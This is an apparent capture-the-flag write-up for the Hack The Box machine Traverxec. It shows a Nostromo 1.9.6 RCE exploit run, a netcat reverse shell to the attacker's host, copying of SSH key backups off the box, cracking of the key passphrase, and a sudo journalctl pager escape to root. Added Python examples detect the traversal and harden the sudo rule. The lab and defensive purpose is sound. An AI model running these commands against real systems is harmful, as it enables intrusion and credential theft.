| Name: | Traverxec |
|---|---|
| Release Date: | 16 Nov 2019 |
| Retire Date: | 11 Apr 2020 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: | |
| Radar Graph: | |
| User Blood: | x4nt0n 00 days, 00 hours, 26 mins, 49 seconds |
| Root Blood: | kolokokop 00 days, 01 hours, 06 mins, 28 seconds |
| Creator: | jkr |
| CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with `nmap -sC -sV -Pn -p- -oA ./Traverxec 10.10.10.165`:

```
$ nmap -sC -sV -Pn -p- -oA ./Traverxec 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-26 22:59 EDT
Nmap scan report for 10.10.10.165
Host is up (0.079s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 301.98 seconds
```
We've got HTTP and SSH on their standard ports, and we know that HTTP is running Nostromo 1.9.6. There's nothing special on the page itself and Gobuster shows us nothing interesting. Searchsploit for Nostromo 1.9.6 gives us a quick RCE route to take. Let's start there.
```
kali@kali:~$ searchsploit nostromo
----------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                           | Path
----------------------------------------------------------------------------------------- ---------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit)                     | multiple/remote/47573.rb
nostromo 1.9.6 - Remote Code Execution                                                   | multiple/remote/47837.py
nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution                     | linux/remote/35466.sh
----------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
kali@kali:~$
```
Let's grab that python exploit, run it and see what happens.
```
python 47837.py 10.10.10.165 80 whoami
```
Awesome. The RCE works. Now let's turn that into a shell by making the command a netcat callback. Use the standard `nc -lvnp 4444` on your machine and run the exploit as:
```
python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.7 4444"
```
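From the defender's side, the directory traversal behind this RCE is visible in the web server's access log if the request path is percent-decoded before inspection. The following is an added example, not code from the box or from the exploit; it parses constructed common-log-format lines (the sample lines and their IPs are made up for this example) and flags any request whose decoded path contains a parent-directory segment, including segments padded with non-printable characters that a naive `..` string match would miss.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (common log format); not real traffic from the box.
SAMPLE_LOG = """\
10.10.14.7 - - [26/Aug/2020:22:59:01 -0400] "GET / HTTP/1.1" 200 1234
10.10.14.7 - - [26/Aug/2020:22:59:02 -0400] "GET /img/logo.png HTTP/1.1" 200 4321
10.10.14.7 - - [26/Aug/2020:22:59:03 -0400] "POST /.%2e/.%2e/bin/sh HTTP/1.1" 200 0
10.10.14.7 - - [26/Aug/2020:22:59:04 -0400] "GET /..%2f..%2fetc/passwd HTTP/1.1" 404 0
"""

# Extracts the method and raw (still percent-encoded) request path from a log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def is_traversal(path: str) -> bool:
    """True if the request path, once percent-decoded, contains a '..' segment.

    Each segment is stripped of non-printable and whitespace characters before
    the comparison, so a '..' that has stray control bytes interleaved in it is
    still caught; a plain substring search on the raw path would not see it.
    """
    decoded = unquote(path.split('?', 1)[0])
    for segment in decoded.split('/'):
        cleaned = ''.join(c for c in segment if c.isprintable() and not c.isspace())
        if cleaned == '..':
            return True
    return False


def flag_traversal_requests(log_text: str) -> list:
    """Return (method, raw_path) for every log line that looks like traversal."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_traversal(match.group('path')):
            hits.append((match.group('method'), match.group('path')))
    return hits


if __name__ == '__main__':
    for method, path in flag_traversal_requests(SAMPLE_LOG):
        print(f'traversal attempt: {method} {path}')
```

Decoding before matching is the whole point: the two flagged sample lines contain no literal `..` in the raw log, and a filter that only looks at the raw path would pass both. A response code of 200 on such a request is the signal worth alerting on, since it means the server actually served something outside the document root.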
and we have a www-data shell. Checking the home directory, we see a "david" folder, but no dice listing the contents. Looking around, we do see that nostromo is running in /var/nostromo and the configs are in /var/nostromo/conf. (Completely unrelated, but is anyone else getting an "Aliens" vibe here? I mean "THE Nostromo"! C'mon! I can't be the only one.) Anyways. Checking out the /var/nostromo/conf/nhttpd.conf file and the .htpasswd file gives us some interesting information.
```
www-data@traverxec:/var/nostromo/conf$ cat ./.htpasswd
cat ./.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
```

From nhttpd.conf:

```
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
```
Changing back into david's home folder, I try to list out the public_www folder and actually get a result: a protected-file-area directory, which holds a backup of SSH identity files. Time to see if I can snag that file.
```
$ scp ./public_www/protected-file-area/backup-ssh-identity-files.tgz kali@10.10.14.7:/home/kali/Desktop/Traverxec/sshbackups.tgz
```
Now, I use `tar -xvf` to extract the files.

```
tar -xvf sshbackups.tgz
```
We get these files:

```
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
```
SSH as David time. Aaaaannnnddd ROADBLOCK. Of course the RSA key has a passphrase. No big deal. I can kick that into John and hopefully crack it with rockyou.txt.
```
kali@kali:~/Desktop/Traverxec/home/david/.ssh$ python3 /usr/share/john/ssh2john.py id_rsa > ../../../hash.txt
```
In case you're wondering, I went back a few dirs so that all my Traverxec files are in the same place. Personal preference, but you do you. We run it through ssh2john and then john and the passphrase is <insert requisite drumroll> "hunter"
So, let's try SSH again now that we know the passphrase. No surprise, but it is successful and we actually have a "save point", if you will. Grab the user flag while you're here and let's start enumerating to root. The LinEnum output is in the CTB file as always. In David's home folder is a bin folder with a server-stats.sh script:

```bash
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
```
I believe I should be able to modify that final line that runs journalctl as sudo by exploiting the less pager command and a GTFOBin. If I run the last line prior to the | it should invoke the "less" command, at which point I can expand the window and then !/bin/bash and grab a root shell. Let's test that out.
Amazingly, that worked! Another box down.
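The root cause here is worth spelling out from the maintainer's side: the `| /usr/bin/cat` at the end of the script only suppresses the pager when the whole pipeline runs, but the sudo rule permits the bare `journalctl` command, which hands its output to `less` whenever stdout is a terminal. The following is an added example, not code from the box; it audits a shell script for sudo invocations of pager-capable commands that lack `--no-pager`, and rewrites them so no interactive pager can be spawned under sudo. The script text is the server-stats.sh shown above, reproduced here as the test input; the set of pager-capable commands is an assumption for this example and would be extended in practice.

```python
import re
import shlex

# The server-stats.sh script shown above, reproduced as the input for this check.
SERVER_STATS_SH = r'''#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
'''

# Commands that hand their output to $PAGER (less by default) when stdout is a tty.
# Assumed list for this example; a real audit would cover every such tool.
PAGER_COMMANDS = {'journalctl', 'systemctl'}


def sudo_pager_risks(script: str) -> list:
    """Return (line_no, command) for each sudo call of a pager-capable command
    that is not pinned with --no-pager.

    A trailing '| cat' on the line does not count as mitigation: the sudoers
    entry authorises the command itself, which spawns the pager when it is run
    interactively, exactly the escape used above.
    """
    risks = []
    for line_no, line in enumerate(script.splitlines(), 1):
        for segment in line.split('|'):
            try:
                argv = shlex.split(segment, comments=True)
            except ValueError:
                continue  # splitting on '|' can cut a quoted string; not a sudo call
            if not argv or argv[0].rsplit('/', 1)[-1] != 'sudo':
                continue
            args = argv[1:]
            while args and args[0].startswith('-'):  # skip sudo's own options
                args = args[2:] if args[0] in ('-u', '-g') else args[1:]
            if not args:
                continue
            command = args[0].rsplit('/', 1)[-1]
            if command in PAGER_COMMANDS and '--no-pager' not in args:
                risks.append((line_no, ' '.join(args)))
    return risks


# Matches 'sudo <path/>journalctl' or 'sudo <path/>systemctl' not already followed by --no-pager.
_FIX_RE = re.compile(r'(\bsudo\s+(?:\S*/)?(?:journalctl|systemctl))(?!\s+--no-pager)')


def harden(script: str) -> str:
    """Insert --no-pager directly after each flagged command.

    The matching sudoers entry must be updated to the same argument list, e.g.
    '/usr/bin/journalctl --no-pager -n5 -unostromo.service', otherwise the bare
    command stays authorised and the fix is cosmetic.
    """
    return _FIX_RE.sub(r'\1 --no-pager', script)


if __name__ == '__main__':
    for line_no, command in sudo_pager_risks(SERVER_STATS_SH):
        print(f'line {line_no}: sudo {command} can spawn a pager')
    print(harden(SERVER_STATS_SH))
```

The same reasoning applies to any sudo rule that runs a tool able to drop into `less`, `vi`, or a subshell: the rule grants the command, not the context the script happens to run it in, so the safe form is to make the command itself incapable of reaching an interactive prompt (here `--no-pager`, or `SYSTEMD_PAGER=` in the environment) and to pin the sudoers entry to that exact argument list.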